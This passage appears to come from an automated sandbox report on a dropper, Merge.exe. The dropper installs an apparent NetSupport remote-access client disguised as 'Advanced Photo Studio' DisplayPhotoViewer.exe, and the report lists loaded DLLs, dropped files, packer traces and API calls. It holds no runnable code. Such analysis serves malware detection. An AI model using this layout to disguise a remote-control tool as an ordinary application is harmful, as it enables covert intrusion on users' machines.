                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: avrt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: iconcodecservice.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wshunix.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File written: C:\Users\user\AppData\Local\3delite\Secondary Display Photo Viewer\DisplayPhotoViewer.ini
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Window found: window name: TButton
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                                Source: Window Recorder | Window detected: More than 3 window changes detected
                                Source: Merge.exe | Static PE information: certificate valid
                                Source: Merge.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                                Source: Merge.exe | Static file information: File size 44935240 > 1048576
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MSVCR100.dll
                                Source: Merge.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x95a400
                                Source: Merge.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x5dd600
                                Source: Merge.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1b4d600
                                Source: Merge.exe | Static PE information: More than 200 imports for KERNEL32.dll
                                Source: Merge.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3284744274.000000006C641000.00000020.00000001.01000000.00000019.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2635853467.000000000B06B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2617292451.000000000A8A1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3287171368.000000006F912000.00000002.00000001.01000000.00000017.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdbL source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F\ctl32\Full\pcichek.pdbN source: DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1201\1201\ctl32\release\pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdbP source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdbGCTL source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: Binary string: pcicapi.pdbm\1201\1201\ctl32\release\pcicapi.pdbH source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\tcctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950075179.000000000C2A1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2643241230.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A63B000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951937785.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2627011351.0000000007AED000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944484464.000000000A642000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3124698930.000000000A720000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116856613.0000000007E20000.00000040.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935540782.000000000A642000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201\AudioCapture\Release\AudioCapture.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2944097023.000000000A6BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2616773901.0000000007AEE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\ctl32\release\htctl32.pdb source: DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A757000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A73C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A520000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\Projects\FreeImageSVN\FreeImage\trunk\Win32\Release\FreeImage.pdb source: DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp
                                Source: Merge.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: Merge.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: Merge.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: Merge.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: Merge.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Unpacked PE file: 6.2.DisplayPhotoViewer.exe.9650000.3.unpack
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1000DA20 _FreeImage_RegisterExternalPlugin@20,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary | 6_2_1000DA20
                                Source: initial sample | Static PE information: section where entry point is pointing to: petite
                                Source: RwcTouch.dll.0.dr | Static PE information: real checksum: 0x299541 should be: 0x291542
                                Source: FreeImage.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x5c57fc
                                Source: bass.dll.0.dr | Static PE information: section name: (empty, i.e. a nameless section)
                                Source: bass.dll.0.dr | Static PE information: section name: petite
                                Source: DisplayPhotoViewer.exe.0.dr | Static PE information: section name: .didata
                                Source: FilesystemDialogs.dll.0.dr | Static PE information: section name: .didata
                                Source: FreeImage.dll.0.dr | Static PE information: section name: _RDATA
                                Source: pcicl32.dll.6.dr | Static PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\Merge.exe | Code function: 0_2_016AEABA push ecx; ret | 0_2_016AEACD
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10275026 push ecx; ret | 6_2_10275039
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10705B60 push eax; ret | 6_2_10705B8E
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1115F709 push ecx; ret | 6_2_1115F71C
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1103FCA1 push 3BFFFFFEh; ret | 6_2_1103FCA6
                                Source: msvcr100.dll.6.dr | Static PE information: section name: .text entropy: 6.909044922675825
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\msvcr100.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\bass.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\JEncrypt.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\RwcTouch.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
Source: C:\Users\user\Desktop\Merge.exe | File created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FilesystemDialogs.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1111FF80 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_1111FF80
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11130AA0 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,6_2_11130AA0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110BB710 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110BB710
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1110B640 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_1110B640
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110C5D30 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110C5D30
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110C5D30 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110C5D30
